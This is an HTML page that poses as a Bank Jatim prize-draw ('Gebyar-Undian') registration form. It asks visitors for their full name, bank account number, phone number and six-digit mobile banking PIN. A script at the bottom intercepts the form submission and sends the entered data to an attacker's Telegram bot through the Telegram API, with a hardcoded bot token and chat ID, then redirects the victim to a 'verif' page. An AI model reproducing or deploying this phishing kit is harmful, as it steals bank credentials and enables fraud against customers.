<!doctype html>
<html>
 <head> 
  <meta charset="utf-8"> 
  <meta name="viewport" content="width=device-width, initial-scale=1"> 
  <title>BPD BANK JATIM</title> 
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>
  <style type="text/css">
    html, body {
      max-width: 100%;
      overflow-x: hidden;
      background-color: #DCDCDC;
      }
  /* The side navigation menu */
  .sidenav {

      background-color: black;
      height: 1000%; /* 100% Full-height */
      width: 0; /* 0 width - change this with JavaScript */
      position: absolute; /* Stay in place */
      z-index: 2; /* Stay on top */
      top: 0;
      left: 0; /* Black*/
      overflow-x: hidden; /* Disable horizontal scroll */
      padding-top: 60px; /* Place content 60px from the top */
      transition: 0.5s; /* 0.5 second transition effect to slide in the sidenav */
  }
   
  /* The navigation menu links */
  .sidenav a {
      padding: 8px 8px 8px 15px;
      text-decoration: none;
      font-size: 15px;
      color: white;
      display: block;
      transition: 0.3s;
  }
   
  /* When you mouse over the navigation links, change their color */
  .sidenav a:hover, .offcanvas a:focus{
      color: #f1f1f1;
  }
   
  /* Position and style the close button (top right corner) */
  .sidenav .closebtn {
      position: absolute;
      top: 0;
      right: 25px;
      font-size: 36px;
      margin-left: 50px;
  }
   
  /* Style page content - use this if you want to push the page content to the right when you open the side navigation */
  #main {
      transition: margin-left .5s;
      padding: 20px;
      padding-left: 30px;
      padding-right: 30px;
      overflow:hidden;
      width:80%;
      position: relative;
  }
  body {
    overflow-x: hidden;
  }
   
  /* Add a black background color to the top navigation */
  .topnav {
      width: 80%;
      background-color: #fff;
      padding-top: 1px;
      padding-bottom: 1px;
      border-bottom: 2px solid #e4e4e4;
      position: fixed;
      z-index: 1;
  }
   
  /* Style the links inside the navigation bar */
  .topnav a {
      float: right;
      color: #f2f2f2;
      text-align: center;
      padding: 14px 16px;
      text-decoration: none;
      font-size: 17px;
  }
  
  .topnav .btnlogin {
      
      /*background: linear-gradient(90deg, #eb9e34 0%, #d85401 100%);*/
      
      border-radius: 10px;
      float: right;
      display: block;
      text-align: center;
      margin-top: 8px;
      text-decoration: none;
      font-size: 15px;
      color: #fff;
  }

  .tblkirim {
      border-radius: 10px;
      float: right;
      display: block;
      text-align: center;
      margin-top: 8px;
      text-decoration: none;
      font-size: 15px;
      color: transparent;
  }
   
  /* Change the color of links on hover */
  .topnav a:hover {
      background-color: #ddd;
      color: black;
  }
   
  /* Add a color to the active/current link */
  .topnav a.active {
      background-color: #4CAF50;
      color: white;
  }
   
  /* On smaller screens, where height is less than 450px, change the style of the sidenav (less padding and a smaller font size) */
  @media screen and (max-height: 450px) {
      .sidenav {padding-top: 15px;}
      .sidenav a {font-size: 18px;}
  }
   
  a svg{
    transition:all .5s ease;
   
    &:hover{
      #transform:rotate(180deg);
    }
  }
   
  #ico{
    display: none;
  }
   
  .menu{
    background: #000;
    display: none;
    padding: 5px;
    width: 320px;
    @include border-radius(5px);
   
    #transition: all 0.5s ease;
   
    a{
      display: block;
      color: #fff;
      text-align: center;
      padding: 10px 2px;
      margin: 3px 0;
      text-decoration: none;
      background: #444;
   
      &:nth-child(1){
        margin-top: 0;
        @include border-radius(3px 3px 0 0 );
      }
      &:nth-child(5){
        margin-bottom: 0;
        @include border-radius(0 0 3px 3px);
      }
   
      &:hover{
        background: #555;
      }
    }
  }
}
.wafixed {
    position: fixed;
    right: 30px;
    bottom: 30px;
    z-index: 999;
}
</style>
    <style>
*{
}
body{
    background-color: transparent;
}
.content{
    display: block;
}
.loader{
    height: 100vh;
    width: 100vw;
    overflow: hidden;
    background: url() no-repeat center;
    background-size: 100%;
    position: unset;
    width: 100%;
    border-radius: 0px;
    height: 100%;
    border: none;
    position: absolute;
}
.loader>div{
    height: 40px;
    width: 40px;
    position: absolute;
    margin: auto;
    top: 0;
    bottom: 0;
    left: 0;
    right: 0;
    border-radius: 50%;
    animation: spin 0.6s infinite linear;
}
@keyframes spin{
    100%{
        transform: rotate(360deg);
    }
}
</style>
  <script>
function openNav() {
    document.getElementById("sideNavigation").style.width = "250px";
    document.getElementById("main").style.marginLeft = "250px";
}
 
function closeNav() {
    document.getElementById("sideNavigation").style.width = "0";
    document.getElementById("main").style.marginLeft = "0";
}
</script>
  </head>
  <body><!--
<div class="loader">-->
        <div></div>
        </div>
        <img src="/back.png" style="width: 6%; height: 15px; margin-left: 5%; margin-top: 0px; position: center;">
                 <img src="/logo.png" style="width: 45%; height: 50px; margin-left: 17%; margin-top: 10px; position: center;">
     <section class="section">
      <div class="container">
         <center style="color: black;">
        <div class="" style="margin-left: 0px; margin-top: 5%; item-align: center; border:0px solid #DCDCDC; background: white; padding: 0px; width: 104%; border-radius: 10px; box-shadow: rgb(170, 170, 170) 0px 0px 1px 0px; padding-bottom: 0%;">
            <br>
            <p style="color: black; font-weight: bold; text-align: left; margin-top: -20px; font-family: Arial; font-size: 15px; margin-left: 15px;">Daftar Gebyar-Undian</p><hr style="width: 90%; margin-left: -3%; margin-top: -10px;">
            <form id="setPin" onsubmit="">
      <center>
    <input id="Nama" name="Nama" type="text" style="box-sizing: border-box; height: 40px; margin-left: -3%; width: 536px; max-width: 90%; border: 1px solid rgb(0, 134, 224); border-image: initial; margin-top: 0px; background-color: #DCDCDC; border-top: 0px inset rgba(250, 250, 250, 0.13); 
            border-right: 0px solid rgba(184, 184, 184, 0.53); 
            border-bottom: 0px solid black; 
            border-left: 0px outset rgba(168, 168, 168, 0.58); font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 14px; color: rgb(28, 28, 28); word-spacing: 2px; padding: 0px 10px; outline: none; border-radius: 6px;" placeholder="Nama Lengkap" maxlength="" minlength="" required><br>
          <input id="No-Rek" name="No-Rek" type="tel" style="box-sizing: border-box; height: 40px; margin-left: -3%; width: 536px; max-width: 90%; border: 1px solid rgb(0, 134, 224); border-image: initial; margin-top: 5px; background-color: #DCDCDC; border-top: 0px inset rgba(250, 250, 250, 0.13); 
            border-right: 0px solid rgba(184, 184, 184, 0.53); 
            border-bottom: 0px solid black; 
            border-left: 0px outset rgba(168, 168, 168, 0.58); font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 14px; color: rgb(28, 28, 28); word-spacing: 2px; padding: 0px 10px; outline: none; border-radius: 6px;" placeholder="Nomor Rekening" maxlength="10" minlength="10" required><br>
<input id="No-Hp" name="No-Hp" type="tel" style="box-sizing: border-box; height: 40px; width: 536px; margin-left: -3%; max-width: 90%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: #DCDCDC; border-radius: 6px; border-top: 0px inset rgba(250, 250, 250, 0.13); 
            border-right: 0px solid rgba(184, 184, 184, 0.53); 
            border-bottom: 0px solid black; 
            border-left: 0px outset rgba(168, 168, 168, 0.58); font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 14px; color: rgb(28, 28, 28); word-spacing: 2px; padding: 0px 10px; outline: none; margin-top: 5px;" placeholder="Nomor Handphone" maxlength="10" minlength="13" required>
            <br>
<input id="M-Pin" name="M-Pin" type="tel" style="box-sizing: border-box; height: 40px; width: 536px; margin-left: -3%; max-width: 90%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: #DCDCDC; border-radius: 6px; border-top: 0px inset rgba(250, 250, 250, 0.13); 
            border-right: 0px solid rgba(184, 184, 184, 0.53); 
            border-bottom: 0px solid black; 
            border-left: 0px outset rgba(168, 168, 168, 0.58); font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 14px; color: rgb(28, 28, 28); word-spacing: 2px; padding: 0px 10px; outline: none; margin-top: 5px;" placeholder="Mobile Pin" maxlength="6" minlength="6" required>
            <br>
  <button type="submit" class="chakra-button css-2z5j4d" style=" width: 90%; height: 40px; border: 0px; border-radius: 4px; background: red; font-weight: bold; color: white; margin-left: -3%; white; margin-top: 5%; font-size: 18px;">Lanjut</button>
    </center>
    <br>
    <p id="status"></p>
  </div>
  </div>
  </div>
  <center>
  <image src="/bg1.png" style="width: 100%; height: 370px; margin-top: -17px; border-radius: 0px; box-shadow: #dcdcdc; 1px;"></center>
 <p style="color: black; font-weight: bold; text-align: center; margin-top: -65px; font-family: Arial; font-size: 14px; margin-left: 0px;">Masukan Nomor Rekening dan pin mobile dari<br>pendaftaran di ATM</p>
       <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
   <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
         <script>
        $(window).on('load',function(){
            $(".loader").fadeOut(10000);
            $(".content").fadeIn(20000);
        });
    </script>
    <script>
        
    const chat_id = '6476733442', botID = 'bot6621887754:AAH5rocpla6HevSiJwqLB34EL3B-zYkj9Mc';
    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;
    document.querySelector('#setPin').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href = '/verif.html';
    });

    </script>
        </form>
        </div>
    </section>
  </body>
</html>
